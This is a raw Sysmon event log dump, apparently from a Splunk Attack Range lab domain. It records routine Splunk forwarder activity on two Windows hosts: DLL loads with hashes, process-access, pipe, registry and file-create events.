734700x800000000000000057344808Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.088{8B6011A9-5B09-618E-3AF3-04000000F101}7176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057344807Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.088{8B6011A9-5B09-618E-3AF3-04000000F101}7176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057344806Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.088{8B6011A9-5B09-618E-3AF3-04000000F101}7176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057344805Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.088{8B6011A9-5B09-618E-3AF3-04000000F101}7176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057344804Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.088{8B6011A9-5B09-618E-3AF3-04000000F101}7176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057344803Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.088{8B6011A9-5B09-618E-3AF3-04000000F101}7176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x800000000000000057344802Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.088{8B6011A9-5B09-618E-3AF3-04000000F101}7176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000057344801Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.088{8B6011A9-5B09-618E-3AF3-04000000F101}7176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 23542300x800000000000000021219411Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:09.867{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B08973065BC801D6D9C08BB322411CCF,SHA256=734CD2646E6B8FEABDBCA4D1259B3F304F46A35C35F193CC16C46489674CC12C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x800000000000000057344800Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.088{8B6011A9-5B09-618E-3AF3-04000000F101}7176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057344799Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.088{8B6011A9-5B09-618E-3AF3-04000000F101}7176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057344798Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.088{8B6011A9-5B09-618E-3AF3-04000000F101}7176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x800000000000000057344797Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.088{8B6011A9-5B09-618E-3AF3-04000000F101}7176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057344796Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.088{8B6011A9-5B09-618E-3AF3-04000000F101}7176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x800000000000000057344795Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.088{8B6011A9-5B09-618E-3AF3-04000000F101}7176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000057344794Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.088{8B6011A9-5B09-618E-3AF3-04000000F101}7176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057344793Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.088{8B6011A9-5B09-618E-3AF3-04000000F101}7176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x800000000000000057344792Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.088{8B6011A9-5B09-618E-3AF3-04000000F101}7176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x800000000000000057344791Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.088{8B6011A9-5B09-618E-3AF3-04000000F101}7176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x800000000000000057344790Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.088{8B6011A9-5B09-618E-3AF3-04000000F101}7176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057344789Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.088{8B6011A9-5B09-618E-3AF3-04000000F101}7176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x800000000000000057344788Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.088{8B6011A9-5B09-618E-3AF3-04000000F101}7176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057344787Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.088{8B6011A9-5B09-618E-3AF3-04000000F101}7176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057344786Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.088{8B6011A9-5B09-618E-3AF3-04000000F101}7176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x800000000000000057344785Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.088{8B6011A9-5B09-618E-3AF3-04000000F101}7176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x800000000000000057344784Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.088{8B6011A9-5B09-618E-3AF3-04000000F101}7176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x800000000000000057344783Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.088{8B6011A9-5B09-618E-3AF3-04000000F101}7176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000057344782Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.088{8B6011A9-BB8B-618B-50A0-04000000F101}92124768C:\Windows\system32\conhost.exe{8B6011A9-5B09-618E-3AF3-04000000F101}7176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057344781Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.088{8B6011A9-5B09-618E-3AF3-04000000F101}7176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057344780Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.088{8B6011A9-5B09-618E-3AF3-04000000F101}7176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057344779Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.088{8B6011A9-5B09-618E-3AF3-04000000F101}7176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057344778Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.088{8B6011A9-5B09-618E-3AF3-04000000F101}7176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241trueSplunk, Inc.Valid 10341000x800000000000000057344777Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.088{8B6011A9-8868-6164-0500-00000000F101}424520C:\Windows\system32\csrss.exe{8B6011A9-5B09-618E-3AF3-04000000F101}7176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057344776Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.088{8B6011A9-BB8A-618B-4CA0-04000000F101}74521152C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8B6011A9-5B09-618E-3AF3-04000000F101}7176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000057344775Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.066{8B6011A9-5B09-618E-3AF3-04000000F101}7176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8B6011A9-886B-6164-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x800000000000000057344774Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.057{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344773Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.057{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=994B80679F7E99D5423E18ACC6FC4E90,SHA256=01547B762E58B8F57CF3EC2C90D500E14CCDD698E3E13C8A2643A34DB34A1F34falsetrue 18141800x800000000000000057344772Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:16:09.057{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057344771Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:16:09.057{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057344770Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:16:09.057{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057344769Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:16:09.057{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057344768Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:16:09.057{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057344767Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:16:09.057{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 11241100x800000000000000057344766Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.057{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344765Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.057{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=399EF501B1422BFDB846F93A92FBEE11,SHA256=DE928B0A7998E366C10E5AF708FD7AE73D609F7382DD83B6CB5F833D55976142falsetrue 10341000x800000000000000021219410Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:09.679{AD5E2759-5B09-618E-04CE-08000000F101}28803248C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000021219409Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-SetValue2021-11-12 12:16:09.648{AD5E2759-5433-6143-1300-00000000F101}308C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7d7bf-0x137e4bbf) 10341000x800000000000000021219408Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:09.493{AD5E2759-54C7-6143-AA00-00000000F101}35682904C:\Windows\system32\conhost.exe{AD5E2759-5B09-618E-04CE-08000000F101}2880C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219407Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:09.493{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219406Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:09.493{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219405Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 